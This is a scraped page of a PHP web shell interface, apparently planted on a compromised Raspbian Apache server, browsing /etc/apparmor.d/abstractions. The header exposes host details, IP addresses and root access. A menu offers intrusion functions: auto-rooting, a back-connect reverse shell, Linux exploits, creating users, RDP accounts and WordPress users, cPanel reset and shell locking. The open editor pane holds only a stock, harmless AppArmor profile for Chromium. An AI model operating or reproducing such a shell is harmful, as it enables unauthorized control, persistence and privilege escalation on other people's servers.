Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.217.91
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
apparmor.d /
abstractions /
[ HOME SHELL ]
Name
Size
Permission
Action
apparmor_api
[ DIR ]
drwxr-xr-x
ubuntu-browsers.d
[ DIR ]
drwxr-xr-x
X
1.67
KB
-rw-r--r--
apache2-common
849
B
-rw-r--r--
aspell
308
B
-rw-r--r--
audio
1.82
KB
-rw-r--r--
authentication
1.55
KB
-rw-r--r--
base
6.11
KB
-rw-r--r--
bash
1.48
KB
-rw-r--r--
consoles
798
B
-rw-r--r--
cups-client
714
B
-rw-r--r--
dbus
593
B
-rw-r--r--
dbus-accessibility
630
B
-rw-r--r--
dbus-accessibility-strict
637
B
-rw-r--r--
dbus-session
638
B
-rw-r--r--
dbus-session-strict
919
B
-rw-r--r--
dbus-strict
677
B
-rw-r--r--
dconf
246
B
-rw-r--r--
dovecot-common
562
B
-rw-r--r--
dri-common
397
B
-rw-r--r--
dri-enumerate
281
B
-rw-r--r--
enchant
1.96
KB
-rw-r--r--
fcitx
456
B
-rw-r--r--
fcitx-strict
712
B
-rw-r--r--
fonts
2.04
KB
-rw-r--r--
freedesktop.org
1.01
KB
-rw-r--r--
gnome
3.2
KB
-rw-r--r--
gnupg
356
B
-rw-r--r--
ibus
640
B
-rw-r--r--
kde
2.71
KB
-rw-r--r--
kde-globals-write
298
B
-rw-r--r--
kde-icon-cache-write
138
B
-rw-r--r--
kde-language-write
458
B
-rw-r--r--
kerberosclient
1.08
KB
-rw-r--r--
ldapclient
686
B
-rw-r--r--
libpam-systemd
659
B
-rw-r--r--
lightdm
3.55
KB
-rw-r--r--
lightdm_chromium-browser
3.33
KB
-rw-r--r--
likewise
489
B
-rw-r--r--
mdns
436
B
-rw-r--r--
mesa
411
B
-rw-r--r--
mir
593
B
-rw-r--r--
mozc
471
B
-rw-r--r--
mysql
641
B
-rw-r--r--
nameservice
3.13
KB
-rw-r--r--
nis
524
B
-rw-r--r--
nvidia
596
B
-rw-r--r--
opencl
269
B
-rw-r--r--
opencl-common
404
B
-rw-r--r--
opencl-intel
564
B
-rw-r--r--
opencl-mesa
527
B
-rw-r--r--
opencl-nvidia
785
B
-rw-r--r--
opencl-pocl
2.75
KB
-rw-r--r--
openssl
470
B
-rw-r--r--
orbit2
93
B
-rw-r--r--
p11-kit
899
B
-rw-r--r--
perl
872
B
-rw-r--r--
php
1.02
KB
-rw-r--r--
php5
105
B
-rw-r--r--
postfix-common
1.08
KB
-rw-r--r--
private-files
1.51
KB
-rw-r--r--
private-files-strict
1.02
KB
-rw-r--r--
python
1.5
KB
-rw-r--r--
qt5
711
B
-rw-r--r--
qt5-compose-cache-write
168
B
-rw-r--r--
qt5-settings-write
435
B
-rw-r--r--
recent-documents-write
346
B
-rw-r--r--
ruby
906
B
-rw-r--r--
samba
830
B
-rw-r--r--
smbpass
476
B
-rw-r--r--
ssl_certs
1.26
KB
-rw-r--r--
ssl_keys
790
B
-rw-r--r--
svn-repositories
1.61
KB
-rw-r--r--
ubuntu-bittorrent-clients
698
B
-rw-r--r--
ubuntu-browsers
1.63
KB
-rw-r--r--
ubuntu-console-browsers
611
B
-rw-r--r--
ubuntu-console-email
601
B
-rw-r--r--
ubuntu-email
977
B
-rw-r--r--
ubuntu-feed-readers
339
B
-rw-r--r--
ubuntu-gnome-terminal
182
B
-rw-r--r--
ubuntu-helpers
3.32
KB
-rw-r--r--
ubuntu-konsole
343
B
-rw-r--r--
ubuntu-media-players
2.18
KB
-rw-r--r--
ubuntu-unity7-base
2.39
KB
-rw-r--r--
ubuntu-unity7-launcher
191
B
-rw-r--r--
ubuntu-unity7-messaging
192
B
-rw-r--r--
ubuntu-xterm
237
B
-rw-r--r--
user-download
876
B
-rw-r--r--
user-mail
837
B
-rw-r--r--
user-manpages
889
B
-rw-r--r--
user-tmp
654
B
-rw-r--r--
user-write
864
B
-rw-r--r--
video
127
B
-rw-r--r--
vulkan
503
B
-rw-r--r--
wayland
580
B
-rw-r--r--
web-data
705
B
-rw-r--r--
winbind
739
B
-rw-r--r--
wutmp
585
B
-rw-r--r--
xad
883
B
-rw-r--r--
xdg-desktop
673
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : lightdm_chromium-browser
# vim:syntax=apparmor # Profile abstraction for restricting chromium in the lightdm guest session # Author: Jamie Strandboge <jamie@canonical.com> # The abstraction provides the additional accesses required to launch # chromium based browsers from within an lightdm session. Because AppArmor # cannot yet merge profiles and because we want to utilize the access rules # provided in abstractions/lightdm, this abstraction must be separate from # abstractions/lightdm. # Requires apparmor 2.9 /usr/lib/chromium/chromium Cx -> chromium, /usr/lib/chromium-browser/chromium-browser Cx -> chromium, /usr/bin/webapp-container Cx -> chromium, /usr/bin/webbrowser-app Cx -> chromium, /usr/bin/ubuntu-html5-app-launcher Cx -> chromium, /opt/google/chrome-stable/google-chrome-stable Cx -> chromium, /opt/google/chrome-beta/google-chrome-beta Cx -> chromium, /opt/google/chrome-unstable/google-chrome-unstable Cx -> chromium, /opt/google/chrome/google-chrome Cx -> chromium, # Allow ptracing processes in the chromium child profile ptrace peer=/usr/lib/lightdm/lightdm-guest-session//chromium, # Allow receiving and sending signals to processes in the chromium child profile signal (receive, send) peer=/usr/lib/lightdm/lightdm-guest-session//chromium, # Allow communications with chromium child profile via unix sockets unix peer=(label=/usr/lib/lightdm/lightdm-guest-session//chromium), profile chromium { # Allow all the same accesses as other applications in the guest session #include <abstractions/lightdm> # but also allow a few things because of chromium-browser's sandboxing that # are not appropriate to other guest session applications. owner @{PROC}/[0-9]*/oom_{,score_}adj w, @{PROC}/sys/kernel/shmmax r, capability sys_admin, # for sandbox to change namespaces capability sys_chroot, # fod sandbox to chroot to a safe directory capability setgid, # for sandbox to drop privileges capability setuid, # for sandbox to drop privileges capability sys_ptrace, # chromium needs this to keep track of itself @{PROC}/sys/kernel/yama/ptrace_scope r, # Allow ptrace reads of processes in the lightdm-guest-session ptrace (read) peer=/usr/lib/lightdm/lightdm-guest-session, # Allow other guest session processes to read and trace us ptrace (readby, tracedby) peer=/usr/lib/lightdm/lightdm-guest-session, ptrace (readby, tracedby) peer=@{profile_name}, # Allow us to receive and send signals from processes in the # lightdm-guest-session signal (receive, send) set=("exists", "term") peer=/usr/lib/lightdm/lightdm-guest-session, # Allow us to receive and send on unix sockets from processes in the # lightdm-guest-session unix (receive, send) peer=(label=/usr/lib/lightdm/lightdm-guest-session), @{PROC}/[0-9]*/ r, # sandbox wants these @{PROC}/[0-9]*/fd/ r, # sandbox wants these @{PROC}/[0-9]*/statm r, # sandbox wants these @{PROC}/[0-9]*/task/[0-9]*/stat r, # sandbox wants these owner @{PROC}/@{pid}/setgroups w, owner @{PROC}/@{pid}/uid_map w, owner @{PROC}/@{pid}/gid_map w, /selinux/ r, /usr/lib/chromium/chrome-sandbox ix, /usr/lib/chromium-browser/chromium-browser-sandbox ix, /usr/lib/@{multiarch}/oxide-qt/chrome-sandbox ix, /opt/google/chrome-*/chrome-sandbox ix, }
Close